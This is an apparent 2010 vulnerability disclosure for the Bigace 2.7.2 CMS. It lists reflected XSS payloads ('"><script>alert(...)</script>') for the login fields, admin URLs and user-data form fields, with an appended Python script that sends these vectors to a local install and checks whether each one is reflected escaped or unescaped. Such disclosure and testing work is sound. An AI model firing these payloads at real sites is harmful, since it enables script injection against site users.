Vendor informed.

Code:
Name    : Bigace 2.7.2
Vendor  : http://www.bigace.de/
Bug     : XSS
Date    : 18.06.2010
Tested  : Ubuntu 10 LTS
Thanks  : 4 you

Details :

There is an XSS vulnerability in the login page:
http://localhost/cmz2/bigace2.7.2/public/index.php?cmd=application&id=-1_tauth_klogin_len

To see it, type in login and password:
"><script>alert(xsshere)</script>
(it's the POST $UID and $PW values). If you use, for example, DataTamper, you can set XSS for the $language variable as well. So there is an option to XSS by $UID, $PW and $language.

It's also possible to make an XSS attack via the search engine (DataTamper + $language = {xss}).

In the admin panel we can do XSS via GET:
http://localhost/cmz2/bigace2.7.2/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len&data[id]=1&adminCharset="><script>alert(1)</script>&data[langid]=en&mode=rap
next:
http://localhost/cmz2/bigace2.7.2/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len&data[id]="><script>alert(2)</script>&adminCharset=&data[langid]=en&mode=rap

XSS found also with $desingName, $description.

When setting a new user, click 'userdata'. Here you have 11 form fields, all exploitable by XSS: $mode, $data_id/firstname/lastname/homepage/phone/mobile/fax/company/street/city/citycode/country.

When creating a new user, $userName is vulnerable to XSS.

When we get to the logging page (admin panel): variables $start, $amount, $namespace and $level. The statistics page is the same... This time the $mode var is vulnerable.

That's (maybe) all. ;)
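The following is an added example and is not part of the original post or of the Bigace code base. It turns the vectors quoted above (the login POST with $UID, $PW and $language, and the two admin GET URLs) into request objects, and adds a reflection check that tells an unescaped reflection (the `">` prefix really closed the attribute and the script tag is live) apart from an entity-escaped one (the fix) or no reflection at all. BASE_URL is the localhost path from the advisory; `render_login_form` is a constructed stand-in for a page that re-displays the submitted username in a value attribute, written only to show the two outcomes offline, and the `probe()` call at the bottom is the only part that touches the network.

```python
"""Reflection checker for the Bigace 2.7.2 XSS vectors quoted in the post.

Added illustration, not the poster's or Bigace's code. Assumes only the URLs
and parameter names given in the advisory; sample responses are constructed.
"""
import html
import urllib.error
import urllib.parse
import urllib.request

# Path quoted in the advisory (assumption: same test install layout).
BASE_URL = "http://localhost/cmz2/bigace2.7.2/public/index.php"

# A unique marker so a hit cannot be confused with ordinary page content.
MARKER = "xss7f3a"
PAYLOAD = f'"><script>alert("{MARKER}")</script>'

# (method, query-string params, POST form params) for each quoted vector.
VECTORS = [
    ("POST", {"cmd": "application", "id": "-1_tauth_klogin_len"},
     {"UID": PAYLOAD, "PW": PAYLOAD, "language": PAYLOAD}),
    ("GET", {"cmd": "admin", "id": "fileAdmin_tADMIN_len", "data[id]": "1",
             "adminCharset": PAYLOAD, "data[langid]": "en", "mode": "rap"}, None),
    ("GET", {"cmd": "admin", "id": "fileAdmin_tADMIN_len", "data[id]": PAYLOAD,
             "adminCharset": "", "data[langid]": "en", "mode": "rap"}, None),
]


def build_request(method, query, form):
    """Build a urllib Request; form params are sent URL-encoded in the body."""
    url = BASE_URL + "?" + urllib.parse.urlencode(query)
    data = urllib.parse.urlencode(form).encode() if form else None
    return urllib.request.Request(url, data=data, method=method)


def reflection_state(body: str) -> str:
    """Classify how the payload came back in a response body.

    'unescaped' - raw payload present: attribute and tag were broken out of.
    'escaped'   - only the entity-encoded copy is present (safe rendering).
    'altered'   - marker present but in some other form: inspect by hand.
    'absent'    - the marker does not appear at all.
    """
    if PAYLOAD in body:
        return "unescaped"
    if html.escape(PAYLOAD, quote=True) in body:
        return "escaped"
    if MARKER in body:
        return "altered"
    return "absent"


def render_login_form(uid: str, escape: bool) -> str:
    """Constructed stand-in (not Bigace code) for a login page that echoes the
    submitted username into a value attribute. With escape=False the leading
    '">' of the payload closes the attribute and the <input> tag, so the
    <script> element lands in the document; with escape=True the quote and
    angle brackets become entities and stay inside the attribute."""
    shown = html.escape(uid, quote=True) if escape else uid
    return f'<form method="post"><input name="UID" value="{shown}"></form>'


def probe(vectors=VECTORS, timeout=5):
    """Send each vector to BASE_URL and report the reflection state."""
    results = {}
    for method, query, form in vectors:
        req = build_request(method, query, form)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
            results[req.full_url] = reflection_state(body)
        except (urllib.error.URLError, OSError) as exc:
            results[req.full_url] = f"error: {exc}"
    return results


if __name__ == "__main__":
    # Offline demonstration of the two outcomes on the constructed page.
    print("vulnerable:", reflection_state(render_login_form(PAYLOAD, escape=False)))
    print("fixed:     ", reflection_state(render_login_form(PAYLOAD, escape=True)))
    # Live check against a local install, if one is running.
    for url, state in probe().items():
        print(state, url)
```

Use `probe()` only against an instance you are authorised to test; the offline part shows why the vendor-side fix is to pass each echoed parameter through htmlspecialchars-style entity encoding with quotes included, which is exactly what `render_login_form(..., escape=True)` models.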